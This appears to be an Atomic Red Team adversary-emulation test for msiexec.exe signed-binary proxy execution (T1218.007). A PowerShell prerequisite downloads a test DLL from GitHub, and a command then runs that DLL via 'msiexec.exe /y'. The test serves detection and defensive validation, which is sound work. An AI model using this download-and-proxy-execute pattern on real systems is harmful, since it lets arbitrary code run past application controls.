#TechniqueName: Signed Binary Proxy Execution: Msiexec
#AtomicTestName: Msiexec.exe - Execute Arbitrary DLL
#Language: cmd

#get_prereq_commands
New-Item -Type Directory (split-path PathToAtomicsFolder\T1218.007\src\x64\T1218.dll) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/x64/T1218.dll" -OutFile "PathToAtomicsFolder\T1218.007\src\x64\T1218.dll"


#prereq_commands
if (Test-Path PathToAtomicsFolder\T1218.007\src\x64\T1218.dll) {exit 0} else {exit 1}


#commands
msiexec.exe /y "PathToAtomicsFolder\T1218.007\src\x64\T1218.dll"

